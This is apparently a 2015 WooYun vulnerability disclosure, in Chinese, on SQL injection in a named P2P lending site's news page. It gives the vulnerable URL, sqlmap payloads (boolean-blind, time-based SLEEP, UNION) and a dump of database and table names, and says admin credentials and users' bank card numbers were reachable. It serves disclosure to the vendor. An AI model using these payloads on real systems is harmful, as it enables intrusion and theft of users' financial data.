乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-11: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
sql注射...
信息泄露...
注射点:http://www.jxlmd.com/shownews1.php?dirid=72&newsid=144
sqlmap identified the following injection points with a total of 54 HTTP(s) requests:---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dirid=72&newsid=144 AND 1142=1142 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: dirid=72&newsid=144 AND (SELECT * FROM (SELECT(SLEEP(5)))eWcC) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: dirid=72&newsid=-7333 UNION ALL SELECT NULL,CONCAT(0x7171706b71,0x6d7a6b43515870546953,0x71767a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.15back-end DBMS: MySQL 5.0.12
[*] information_schema[*] lmd2014[*] lmdlmd[*] test........Database: lmd2014[52 tables]+---------------------+| actionlogs || activity || admin || adminroles || area || article || assetstable || autotender || autotenderlogs || backinterestdetails || backpassword || banks || biao || biaopropertys || borrowers || capitalrecords || cashwithdrawal || city || contract || departments || dir || emailconfig || fkmessage || hbtype || hbxz || hitsearchs || htmltemplate || interestdetails || investment || irmf || lbpics || loanapplication || loginlog || peoplemanagement || prize || prize_zj || product || province || rechargerecord || recommendeds || riskreserve || settings || sysmessateusers || sysmssage || testtime || testupdate || tjmoney || tjmoneylist || torepaytheloan || toundertakedetails || userbanks || usercontract |+---------------------+.........
tables 挺多的,估计数据也不少......管理员账号密码
一些用户的银行卡号等信息.....有好几百...
友情检测...
毕竟是做P2P的,web安全也很重要安装安全软件,过滤危险字符...
危害等级:中
漏洞Rank:10
确认时间:2015-09-11 17:18
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无